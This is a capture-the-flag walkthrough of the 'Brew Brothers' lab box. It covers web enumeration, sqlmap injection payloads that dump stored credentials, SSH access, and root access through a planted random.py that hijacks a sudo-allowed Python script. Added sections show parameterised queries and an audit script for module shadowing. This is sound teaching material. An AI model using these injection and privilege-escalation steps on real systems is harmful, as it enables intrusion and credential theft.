Creator: smogetto
Difficulty: Medium
Category: SQL Injection
Link: https://parrot-ctfs.com/hacking/labs/
Host: 10.14.0.32
Objectives
Obtain user and root flags
Answer all questions
Description:
The Brew brothers have a vulnerable Website. Can you hack into it?
Diving into the barrel
The box is pretty direct and easy: we already know we are supposed to perform SQL injection on a website, we just don't know where it occurs.
Before anything, check if your VPN is running and try pinging the box to ensure it's up for hacking.
A toast to Nmap
We run a simple yet comprehensive nmap scan to find which port the web server is listening on:
nmap 10.14.0.32
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 50.52 seconds
50.52 secs?
Sweet!! We have 2 ports open: 80 (http) and 22 (ssh).
As we saw earlier, we are supposed to perform SQL injection, so no need to concentrate on ssh. If you find yourself brute-forcing ssh, just know you're doing something wrong (or not :-) ).
Anyway, without wasting time, let's jump straight into enumerating the web server.
Bytes and Barleys: Apache's Tap
First of all, we need to enumerate the webserver manually by visiting the website in our browser.
Honestly, that doesn't look good at all. The only things worth looking at here are the Apache version, developer comments, or response headers (for starters), but this should not stop us from doing further enumeration.
We need to find that SQLi by "fire by ffuf". You see what I did there? OK, moving on!
Fizzing Fuzz and Fermented
After not finding anything useful on the default Apache page, we move on to fuzzing for hidden directories and files using ffuf or feroxbuster (you can use gobuster too). I'll use ffuf and feroxbuster because I like them and they have good color output.
ffuf -u "http://10.14.0.32/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js,.env,.proto -c
As you can see, my syntax is longer than the NFT hype. Let's try another one with feroxbuster:
feroxbuster --url http://10.14.0.32/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak,pcap,properties,jpg,png,jpeg,pdf,db -k
LMAO, still longer. The advantage of using feroxbuster is that it fuzzes recursively, and it has a cool name: "Ferric Oxide".
And the results are out:
http://10.14.0.32/index.html
http://10.14.0.32/website
http://10.14.0.32/website/index.html
http://10.14.0.32/website/search.html
http://10.14.0.32/website/search.php
http://10.14.0.32/website/contact.html
http://10.14.0.32/website/contact.php
http://10.14.0.32/website/l.txt
That's brilliant, innit! We have something to look into:
/website/search.php
/website/contact.php
I assume we all hate PHP, so let's get into injectin'.
Brewing Queries
Let's visit http://10.14.0.32/website/contact.php and http://10.14.0.32/website/search.php and see if there is anywhere to input bad things.
Are we though? We shall find that out later. Moving on.
Bruh!!?? We didn't even search for anything, but it's ok.
Since we are not getting anything useful so far, we need to capture the requests using Burp to see what's brewing down there.
We are onto nothing here. Let's try saving both requests and running them through sqlmap, hoping for the best.
That didn't work. I guess we should re-evaluate our hate for PHP and direct it at HTML. Remember, we have other endpoints with the same names but with .html. We should check them out:
/website/search.html
/website/contact.html
Damn! That's a lot of input fields you got there. Moving on!
Now that's where I would like to inject my bad stuff.
A shot of SQL Injection: Brew with Caution!
We can capture a search request to http://10.14.0.32/website/search.html and take it through sqlmap to see if we can get anything juicy:
sqlmap -r search --risk 3 --level 5 --dbs
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=hHIb' AND (SELECT 8709 FROM (SELECT(SLEEP(5)))mmPE) AND 'lQVH'='lQVH
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: search=hHIb' UNION ALL SELECT CONCAT(0x7176626a71,0x734243434c67584b654d786e6173774b4a76596348697a4d515073694e69456874766a774d47484d,0x7178707671),NULL-- -
Holy hack!!!! This should be easy.
available databases [7]:
[*] creds
[*] information_schema
[*] lol
[*] mysql
[*] performance_schema
[*] products
[*] sys
Yes, creds. I will have those creds on the go.
Now we run this one-liner that will dump those creds:
sqlmap -r search2.req --batch -D creds --tables --dump
Database: creds
Table: credentials
[1 entry]
+----------+----------+
| password | username |
+----------+----------+
| p*****r | charles |
+----------+----------+
Who stores their passwords in clear text? Anyway, that's a fine addition to our collection.
We can use the creds on ssh and voila! we have our initial foothold.
ssh charles@10.14.0.32
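Why the search parameter was injectable and what the fix looks like, as an added example that is not part of the original writeup: a Python/sqlite3 stand-in for search.php with the string-concatenated query beside a parameterised one, both run against a payload of the same shape sqlmap reported (close the string, UNION two columns, comment out the rest). Table and column names follow the writeup; the rows are constructed.

```python
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the box's products and creds data;
    table and column names follow the writeup, the rows are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(name TEXT, price TEXT);
        INSERT INTO products VALUES ('Pale Ale', '4.50'), ('Stout', '5.00');
        CREATE TABLE credentials(password TEXT, username TEXT);
        INSERT INTO credentials VALUES ('p*****r', 'charles');
    """)
    return db

def search_unsafe(db, term):
    """What an injectable search.php effectively does: the POST value is
    pasted into the SQL text, so quotes and UNION become part of the query."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_safe(db, term):
    """Parameterised form: the driver binds term as data, never as SQL."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

# Same shape as sqlmap's UNION finding: close the string, UNION two columns,
# comment out the rest. Here it reads the credentials table the writeup dumped.
UNION_PAYLOAD = "hHIb' UNION ALL SELECT username, password FROM credentials-- -"

def compare(term):
    """Run one search term through both handlers and return (unsafe, safe)."""
    db = build_db()
    return search_unsafe(db, term), search_safe(db, term)

if __name__ == "__main__":
    print(compare("Ale"))           # identical: one product row from each
    print(compare(UNION_PAYLOAD))   # unsafe leaks charles's row, safe returns []
```

The parameterised handler treats the whole payload as a search string, so the only thing it can ever return is product rows.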
The Root Beer chronicles
Congratulations on your user access; now the only thing remaining is gaining root access to this machine.
Before pwning, we need to make our environment stable using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Sweet! Now it's hackin' time. Get your hacker gloves and leggings!!
As we can see in the user directory, we have note.txt and backup.py.
charles@brew-brothers:~$ cat note.txt
Hello charles Dale here, make sure you finish the backup script for the admin panel.
Cheers,
Dale
import random
import requests
import hashlib

url = "http://10.14.0.32"

# Fetch whatever /zend.php returns and keep the body as the value to back up
r = requests.post(url + "/zend.php")
earl = str(r.text)

def encrypt(string):
    # Not encryption: a plain SHA-256 hex digest of the response body
    sha = hashlib.sha256(string.encode()).hexdigest()
    return sha

print("\n")
crk = encrypt(earl)
# Append a random number to the digest
crk = crk + str(random.randint(1, 100))
with open("/tmp/websitebackupass.txt", "a") as web:
    web.write(crk + ":" + earl)
    web.write("\n")
Now let's execute sudo -l to see what our local man charles can execute with sudo rights on the machine.
User charles may run the following commands on brew-brothers:
(ALL) NOPASSWD: /usr/bin/python3.8 /home/charles/backup.py
Do you smell it? Python library hijacking.
Let's get into it, shall we? Open random.py with nano or vim, then slap this bad boy in:
import os
os.system("/bin/bash")
Save it and execute backup.py as root to gain root access. EZ.
sudo -u root /usr/bin/python3.8 /home/charles/backup.py
root@brew-brothers:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@brew-brothers:/home/charles#
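Added example (mine, not code from the box or the writeup) showing why that sudo rule was a problem and how to spot it: when python3 runs a script without -I, the script's own directory is sys.path[0], so a random.py next to backup.py is imported instead of the stdlib module. The audit below parses a script's imports, reports which ones a file in that directory already satisfies, and flags whether a non-root user can write there; the demo() scenario is constructed in a temp dir and the function names are my own.

```python
import ast
import os
import stat
import tempfile

def imported_modules(script_path):
    """Top-level module names the script imports (import x / from x import y)."""
    with open(script_path) as f:
        tree = ast.parse(f.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def shadow_candidates(script_path):
    """Imports a file beside the script satisfies first (script dir is sys.path[0])."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    found = {}
    for name in sorted(imported_modules(script_path)):
        for cand in (os.path.join(script_dir, name + ".py"),
                     os.path.join(script_dir, name, "__init__.py")):
            if os.path.exists(cand):
                found[name] = cand
                break
    return found

def writable_by_non_root(path):
    """True if someone other than root could drop a module into this directory."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudo_script(script_path):
    """Findings for a script that sudo lets a user run as root."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    return {"shadowed": shadow_candidates(script_path),
            "dir_writable_by_non_root": writable_by_non_root(script_dir)}

def demo():
    """Constructed scenario: backup.py with the writeup's imports, random.py beside it."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "backup.py")
    with open(script, "w") as f:
        f.write("import random\nimport requests\nimport hashlib\n")
    with open(os.path.join(d, "random.py"), "w") as f:
        f.write("# placeholder standing in for a planted module\n")
    return audit_sudo_script(script)
```

On the box, /home/charles is owned by charles, so the directory check fires even before any random.py exists; keeping the script in a root-owned directory and invoking it with python3 -I removes both conditions.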
Good luck with your next machine.